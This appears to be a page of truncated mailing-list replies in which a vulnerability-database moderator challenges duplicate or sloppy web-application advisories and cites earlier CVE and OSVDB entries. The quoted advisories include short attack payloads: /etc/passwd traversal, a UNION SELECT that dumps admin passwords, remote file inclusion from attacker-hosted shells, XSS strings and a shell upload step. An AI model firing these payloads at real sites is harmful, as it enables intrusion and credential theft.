: Real player resource exhaustion Vulnerability
: Real Networks Real Player is prone to Resource exhaustion vulnerability.
: When processing specially crafted HTML file, Real Player uses a value
: from the file to control a loop operation. Real player fails to validate
: the value before usin
CVE-2008-1609 & CVE-2006-7128
same issue, 4.0 RC1 and RC2. really guys? at least check VDBs before you
publish.
: Vulnerability ID: HTB22666
: Status: Not Fixed, Vendor Alerted, Awaiting Vendor Response
Did you check the vendor's page?
This page last updated on : May 20, 2006
: Vulnerability ID: HTB22695
: Reference: http://www.htbridge.ch/advisory/xss_in_compactcms.html
: Product: CompactCMS
: Vendor: compactcms.nl ( http://www.compactcms.nl/ )
: Vulnerable Version: 1.4.1
: Vendor Notification: 04 November 2010
: Vulnerability Type: XSS (Cross Site Scripting)
: Sta
: New eVuln Advisory:
: Cookie Auth Bypass in Hot Links SQL
: http://evuln.com/vulns/140/summary.html
Already discovered and disclosed:
http://www.exploit-db.com/exploits/8684/
Published: 2009-05-14
: ---[ Summary ]-
: eVuln ID: EV0140
: Software:
Seems to be a duplicate of:
http://www.exploit-db.com/exploits/9237/
CVE: 2009-3219 OSVDB-ID: 56336
>From 2009-07-23
yes?
On Tue, 16 Nov 2010, eidelwe...@windowslive.com wrote:
:
: AWCM v2.2 Auth Bypass Vulnerabilities
: ###
: Multiple vulnerabilities were found in web application chCounter <= 3.1.3.
:
: Author:
: - Matias Fontanini(mfontan...@cert.unlp.edu.ar).
:
: Requirements:
: - Downloads must be enabled(this is not default).
: - magic_quotes off.
: - Access to administration site
That is a lot of prerequisite
Date: 2010-04-03
http://packetstorm.crazydog.pt/1004-exploits/wolfcms-xsrf.txt
This looks to be the same finding in 0.6.0a
On Thu, 25 Nov 2010, advis...@htbridge.ch wrote:
: Vulnerability ID: HTB22681
: Reference: http://www.htbridge.ch/advisory/xsrf_csrf_in_wolf_cms.html
: Product: Wolf CMS
:
Nice try.. republishing old findings again?
On Thu, 30 Dec 2010, advis...@htbridge.ch wrote:
: Vulnerability ID: HTB22750
: Reference: http://www.htbridge.ch/advisory/sql_injection_in_lightneasy.html
: Product: LightNEasy
: The vulnerability exists due to failure in the "/LightNEasy.php" script
Not only was this previously discovered, you don't seem to understand the
variables:
On Thu, 30 Dec 2010, advis...@htbridge.ch wrote:
: Vulnerability ID: HTB22754
: Reference: http://www.htbridge.ch/advisory/sql_injection_in_lightneasy_1.html
: Product: LightNEasy
:
: Vulnerability Details:
:
: Vulnerability ID: HTB22770
: Reference: http://www.htbridge.ch/advisory/sql_injection_in_phpmysport.html
: Vulnerability Details:
: The vulnerability exists due to failure in the "/index.php" script to
: properly sanitize user-supplied input in "v1" variable. Attacker can
: alter queries to
: Vulnerability ID: HTB22776
: Reference:
http://www.htbridge.ch/advisory/stored_xss_vulnerability_in_diafan_cms.html
: Product: diafan.CMS
: Vulnerability Details:
: User can execute arbitrary JavaScript code within the vulnerable application.
:
: The vulnerability exists due to failure in the
: Vulnerability ID: HTB22827
: Reference:
http://www.htbridge.ch/advisory/file_content_disclosure_in_wikipad.html
: Vulnerability Type: File Content Disclosure
: Risk level: Low
: Vulnerability Details:
: The vulnerability exists due to failure in the "/pages.php" script to
properly sanitize
On Thu, 20 Jan 2011, advis...@htbridge.ch wrote:
: Vulnerability ID: HTB22785
: Reference: http://www.htbridge.ch/advisory/sql_injection_in_pixie.html
:
: Vulnerability Details:
: The vulnerability exists due to failure in the "/index.php" script to
properly sanitize user-supplied input in "ref
Seriously?
This was reported in Jul 2001 by Hiromitsu Takagi, and assigned
CVE-2001-1161.
http://seclists.org/bugtraq/2001/Jul/22
Would you please:
a) check to see if a vulnerability has been published
b) test current software
c) include the full name of the product you are testing
"IBM Lotu
Discovered 2008-01-21, covered by CVE-2008-0422 / OSVDB 40960.
On Sat, 5 Jun 2010, advis...@htbridge.ch wrote:
: Vulnerability ID: HTB22398
: Reference:
http://www.htbridge.ch/advisory/sql_injection_vulnerability_in_boastmachine.html
: Product: boastMachine
: Vendor: Kailash Nadh
: Vulnerable V
On Sat, 12 Jun 2010, i...@securitylab.ir wrote:
: #
: # Securitylab.ir
: #
: # Application Info:
: # Name: Cherokee Web Server
: # Version: 0.5.3
: # Download:
Hello,
For both of your WebDB advisories, you say:
: Product: WebDB
: Vendor: Lois Software
: Vulnerable Version: 2.0a and Probably Prior Versions
: Status: Fixed by Vendor
: Risk level: High
: Solution: There is no need for anybody to upgrade to the latest version.
Why is there no need for
Already discovered 2010-05-12 (CVE-2010-1994) by Secunia and possibly
Holistic. Original advisories:
http://secunia.com/secunia_research/2010-56
http://holisticinfosec.org/content/view/141/45/
On Tue, 29 Jun 2010, advis...@htbridge.ch wrote:
: Vulnerability ID: HTB22444
: Reference:
http://
This was already disclosed on 2008-01-06 (CVE-2008-4612) in version 4.0.
On Tue, 29 Jun 2010, advis...@htbridge.ch wrote:
: Vulnerability ID: HTB22442
: Reference:
http://www.htbridge.ch/advisory/xss_vulnerability_in_portalapp_1.html
: Product: PortalApp
: Vendor: Latek
: Vulnerable Version: 4
: Vulnerability ID: HTB22445
: Reference: http://www.htbridge.ch/advisory/xss_vulnerability_in_cruxcms.html
: Product: CruxCMS
: Vendor: CruxSoftware
: Vulnerable Version: 3.00 and Probably Prior Versions
: Risk level: Medium
: Credit: High-Tech Bridge SA - Ethical Hacking & Penetration Testing
: Product: WebPress
: Vendor: YWP ( http://www.goywp.com/ )
: Vulnerable Version: Current at 01.07.2010 and Probably Prior Versions
The vendor web page has a demo feature, that is powered by "YWP 13.00.04".
Creating a demo via their site, the changelog shows "05.05.2010 - Released
version 13.0
: Vulnerability ID: HTB22489
: Reference:
http://www.htbridge.ch/advisory/xss_vulnerability_in_theeta_cms_2.html
: Vendor: MN Tech Solutions
: Vulnerable Version: 0.0
: The vulnerability exists due to failure in the "forum.php" script to
: properly sanitize user-supplied input in "forum" variab
: Product: Eden Platform
: Vendor: Preation ( http://www.preation.com/ )
: Vulnerable Version: Current at 27.07.2010 and Probably Prior Versions
: Risk level: Medium
The vendor web page has a free trial feature, with no obvious version.
Your version of 01.07.2010 appears to be something you de
: Vulnerability ID: HTB22576
: Reference:
http://www.htbridge.ch/advisory/sql_injection_vulnerability_in_tcms_2.html
: Vulnerability ID: HTB22571
: Reference:
http://www.htbridge.ch/advisory/sql_injection_vulnerability_in_tcms.html
Aside switching from GET to a POST request, what is the differ
: 1. OVERVIEW
:
: The QtWeb Browser application is vulnerable to Insecure DLL Hijacking
: Vulnerability. Similar terms that describe this vulnerability have been
: come up with Remote Binary Planting, and Insecure DLL
: Loading/Injection/Hijacking/Preloading.
: 3. VULNERABILITY DESCRIPTION
:
: Vulnerability ID: HTB22584
: Reference: http://www.htbridge.ch/advisory/xss_vulnerability_in_compucms.html
: Product: CompuCMS
: Vendor: CompuSoft A/S ( http://www.compusoft.dk/ )
: Vulnerable Version: Current at 06.08.2010 and Probably Prior Versions
Once again, you assign a "version" based
: Vulnerability ID: HTB22564
: Reference: http://www.htbridge.ch/advisory/xss_vulnerability_in_auto_cms.html
: Product: Auto CMS
: Vendor: Roberto Aleman ( http://ventics.com/autocms/ )
: Vulnerable Version: 1.6 and Probably Prior Versions
: Vulnerability Type: XSS (Cross Site Scripting)
As an
it would really require
something like a CSRF.
Fortunately for attackers, it seems you guys missed the CSRF in this
application that HolisticInfoSec found:
http://holisticinfosec.org/content/view/154/45/
Keep up the solid research guys.
- security curmudgeon
ious actions.
Demonstrating a few of those vectors would be more helpful.
- security curmudgeon
: Vulnerability ID: HTB22620
: Reference:
http://www.htbridge.ch/advisory/xss_vulnerability_in_lantern_cms.html
: Product: Lantern CMS
: Vendor: Lantern ( http://www.lanterncms.com/www/html/7-home-page.asp )
: Vulnerable Version: Current at 18.09.2010 and Probably Prior Versions
>From the vendo
: Vulnerability ID: HTB22618
: Reference:
http://www.htbridge.ch/advisory/xss_vulnerability_in_expression_cms_1.html
: Product: Expression
: Vendor: Backbone Technology ( http://www.backbonetechnology.com )
: Vulnerable Version: Current at 18.09.2010 and Probably Prior Versions
How do you know
> Quick clarification on several points based on emails that I've received:
>
> 1) We did notify Apache before going public. ISS X-Force emailed
> Apache in the morning at 9:44am regarding this Advisory. We waited until
> the afternoon before sending to Bugtraq for approval and finally r
-- Forwarded message --
From: Rick Elnor
To: [EMAIL PROTECTED]
Date: Sun, 29 Jan 2006 10:11:08 -0800
Subject: [OSVDB Mods] [Change Request] 22693: Etomite todo.inc.php cij Variable
Arbitrary Command Execution
Hello,
I am Rick Elnor, the Etomite CMS security expert and owner
: http://www.activecampaign.com/support/
:
: Version : 1-2-All KB
:* KnowledgeBuilder KB
:* iSalient KB
:* SupportTrio KB
:* visualEdit KB
:* General KB
:
: This is a support-faq script. The questions is asked. But this a script
: hi
: VENDOR :http://nucleuscms.org/
: BY : s3rv3r_hack3r (hackerz.ir admin)
: bug:
: nucleus3.22/nucleus/plugins/skinfiles/index.php = include($DIR_LIBS .
'PLUGINADMIN.php');
: Exloit:
: http://victim/nucleus/plugins/skinfiles/index.php?DIR_LIBS=http://shell
I haven't examined the source cod
: Discovered by: Qex
: Date: 25 April 2006
:
: /member.php?action=viewpro&member=[XSS]
Can you confirm this? Doing a quick grep of the 1.0.2 source code finds no
occurace of "viewpro" at all. The line above also happens to be exactly
the same as your DevBB disclosure, suggesting this may be
:
: By: Mr-X
: Email: [EMAIL PROTECTED]
: Subject: modules name(Sections)SQL Injection
:
:
: example:-
: /modules.php?name=Surveys&op=results&pollID=8&mode=&order=&thold=[SQL]
What product is this in? Searching for "modules name sections" is not that
h
: --
: foud by: BoNy-m
: Site: http://www.alshmokh.com
: E-mail: [EMAIL PROTECTED]
: --
:
: Search:
: allinurl:tseekdir.cgi
:
: example:
: /tseekdir.cgi?location=/etc/passwd%00
: /tseekdir.cgi?id=1055&location=/etc/passwd%00
: /tsee
On Tue, 13 Jun 2006, [EMAIL PROTECTED] wrote:
:
http://[SITE]/default.asp?mod=search&type=simple&q=%27+union+select+1%2Cadmin_password%2C3%2C4+from+admin_users+%27+&cmdSearch=Search
:
: credits: EntriKa & The_BeKiR & erne
Which "Ashop" is this?
AShop Software
www.ashopsoftware.com/
Ashop Sho
: ##
: # Fusion Polls (xtrphome) Remote File Inclusion
: ##
Is this Fusion Polls:
Fusion Poll 1.1
http://www.fusionphp.net/
http://www.ezgoal.com/channels/developer/f.asp?f=319691
Fusion Poll
: Have you ever nmap-ed a network with AS/400s? If you have, you probably
: know that doing so will, in at least half the cases, either crash the
: box, hang up one or more services, or really confuse the IP stack to the
: point that the box almost screeches to a halt.
This is frequently obse
: We frequently see requests for contact on this mailing list. Readers
: are encouraged to ensure that their software vendors are aware of the
: following documents, which have more specific guidelines for vendors to
: establish. Because these documents have been co-authored by major
: organ
On Sat, 20 Dec 2008, ad...@bugreport.ir wrote:
: +-->Cross Site Scripting (XSS). Reflected XSS attack in "index.php" in "q"
: parameter.
:
: POC:
:
http://[URL]/chicomas/index.php?q=";alert(/www.BugReport.ir/.source)
This was disclosed on May 5th [1] by Hadi Kiamarsi and was assigned BID
2902
sly than Oracle's.
Any input from either side to help clarify?
- security curmudgeon
p.s. Same exact question and CVSS2 scores for SYS.DBMS_AQJMS_INTERNAL
(DB15), CVE-2008-1821, same Oracle CPU.
Hello Assurent & Oracle,
On Tue, 13 Jan 2009, vr-subscription-nore...@assurent.com wrote:
: Oracle BEA WebLogic Server Apache Connector Buffer Overflow
:
: Reference: http://www.bea.com/weblogic/server/
:
: 2. Vulnerability Summary
:
: A remotely exploitable vulnerability has been discovered
iDefense, CVE or Oracle;
The two iDefense advisories present a bit of confusion over the CVE
assignments and number of vulnerabilities. There appear to be two
vulnerabilities (login.php and common.php) that may have 3 CVE numbers
assigned. Could anyone clarify?
First advisory, mail list post
(Note the date, late reply I know..)
On Tue, 29 Jul 2008, Andy Davis wrote:
: The IOS FTP server vulnerabilities were published in an advisory by
: Cisco in May 2007. The FTP server does not run by default, it is not
: widely used and has since been removed from new versions of IOS.
: Therefo
: ZDI-09-007: Apple QuickTime Cinepak Codec MDAT Heap Corruption
: Vulnerability
: http://www.zerodayinitiative.com/advisories/ZDI-09-007
: January 21, 2009
:
: -- CVE ID:
: CVE-2009-2006
CVE-2009-0006 perhaps?
On Fri, 15 Aug 2008, r3d.w...@yahoo.com wrote:
(pardon the late reply)
: #!user/bin/python
: # -*- coding: cp1256 -*-
:
#
: munky-bliki Lfi
: Oracle Database Buffer Overflow in SYS.OLAPIMPL_T.ODCITABLESTART
: Risk Level: High
: Oracle Database Server provides the SYS.OLAPIMPL_T package. This package
: contains the procedure ODCITABLESTART which is vulnerable to buffer
: overflow attacks. Impact: By default SYS.OLAPIMPL_T has EXEC
: Discovery by :- Sw33t h4cK3r
: powered by : saphp
:
:
: Exploit :
: http://Example.com/story/showcat.php?forumid=[SQL]
Discovered 2005-10-24
http://archives.neohapsis.com/archives/bugtraq/2005-10/0275.html
Discovered 2006-04-12
http://archives.neohapsis.com/archiv
: Discovery by:- Sw33t h4cK3r
:
: POWERED BY: SaphpLesson2.0
: --
:
: Exploit :
: http://Example.com/show/show.php?lessid=[SQL]
Discovered 2006-05-27
http://archives.neohapsis.com/archives/bugtraq/2006-05/0610.html
: Olmek Var$a Kaderde Dert Ekleme Derdine Team :)
: Portal:Friend Script 2.5 - 2.4 Remote File İnclude Vulnerable
: Author:Yollubunlar
: http://yollubunlar.Org
:
: Exploit:script_path/inc/tell_a_friend.inc.php?script_root=Sh3ll.txt?
This was discovered on 2005-03-07 and reported for version 2.7
: MEFISTO PreSents...
.. something already disclosed before!
: Script: RIG Image Gallery
: Script Download: http://sourceforge.net/project/showfiles.php?group_id=54367
:
: Contact: ilker Kandemir
:
: Exploit: check_entry.php?dir_abs_src=http://attacker.php?
2006-06-20
http://cve.mitre.org/c
: # Phorm v3.0 Remote File Upload Vulnerability
:
: # ilker kandemir
:
:
: # Exploit: http://[site]/[phorm_path]/lib/fileupload.php [+]=>>
upload your shell.php
:
: # http://[site]/[phorm_path]/files/phpshell.php
This also won't work unless an administrator makes changes to
: BellaBiblio Admin Login Bypass
:
: SCRIPT: BellaBiblio
:
: DOWNLOAD: http://www.jemjabella.co.uk/scripts/BellaBiblio.zip
:
: AUTHOR: ilker kandemir
:
: Bug in;(admin.php)
: if (isset($_COOKIE['bellabiblio'])) {
: if ($_COOKIE['bellabiblio'] == md5($admin_name.$admin_pass.$secret)) {
:
On Mon, 13 Apr 2009, mariani...@hotmail.com wrote:
: Discovered by Sirdarckcat from elhacker.net
By 'discovered', you mean 'copied from the disclosure in September 2006'
right?
CVE-2006-4605 through CVE-2006-4608.
: Title: Elkapax CMS Multiple Vulnerabilities
:
: Vendor: www.elkapax.com
: Fix: N/A
: Elkapax is a CMS producer in Iran. Search page in Elkapax CMS
:
: product are vulnerable to XSS vulnerability.
:
: Cross Site Scripting vulnerability in Search page in "q" parameter.
:
: http://example.co
58 matches
Mail list logo